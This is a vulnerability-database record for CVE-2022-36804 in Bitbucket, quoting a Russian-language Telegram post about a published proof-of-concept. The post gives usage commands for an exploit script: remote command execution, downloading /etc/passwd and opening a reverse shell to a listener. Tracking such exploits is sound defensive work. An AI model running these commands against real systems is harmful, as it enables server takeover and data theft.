{"uuid": "3ed0f57d-df75-4025-a852-7eaee4981c67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-36804", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/997", "content": "CVE-2022-36804 - Bitbucket\n\u0414\u043b\u044f versions &lt;8.3.1 (\u0442\u0430\u043a \u043a\u0430\u043a \u043f\u0430\u0442\u0447 \u0443\u0436\u0435 \u0432\u044b\u043f\u0443\u0449\u0435\u043d)\n\u0421\u043f\u043b\u043e\u0438\u0442 \u0438\u0449\u0435\u0442 \u043e\u0431\u0449\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0435 \u0440\u0435\u043f\u044b \u043d\u0430 \u0445\u043e\u0441\u0442\u0435 \nBitbucket\n \u0434\u043b\u044f \u0438\u0441\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.\n*\n\u0415\u0441\u043b\u0438 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u0439 \u0440\u0435\u043f\u044b \u043d\u0435\u0442, \u0442\u043e \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0444\u0430\u0439\u043b cookie BITBUCKETSESSIONID. \n*\nRCE (Remote Code Execution)\nCVE-2022-36804.py -e rce --cmd \"curl http://example.com/\" http://bitbucket.local:7990/\n\nDownload /etc/passwd\nCVE-2022-36804.py -e download --server-file /etc/passwd http://bitbucket.local:7990/\n\nReverse_shell\nCVE-2022-36804.py -e rev_shell --host 127.0.0.1 --port 31337 http://bitbucket.local:7990/\n\n#bitbucket", "creation_timestamp": "2022-09-20T06:29:08.000000Z"}